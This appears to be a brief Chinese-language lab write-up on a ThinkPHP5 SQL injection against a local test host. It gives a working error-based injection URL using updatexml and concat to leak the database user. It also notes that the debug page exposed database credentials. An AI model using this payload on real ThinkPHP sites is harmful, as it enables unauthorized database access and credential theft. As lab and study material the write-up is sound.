ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

发布时间 2023-08-29 11:23:47作者: kalixcn

ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

启动后,访问http://10.10.10.154/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来,说明环境运行成功。
img

漏洞利用
访问http://10.10.10.154/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,信息成功被爆出:

img

当然,这是一个比较鸡肋的SQL注入漏洞,但通过DEBUG页面,我们找到了数据库的账号、密码:
img

这又属于一个敏感信息泄露问题。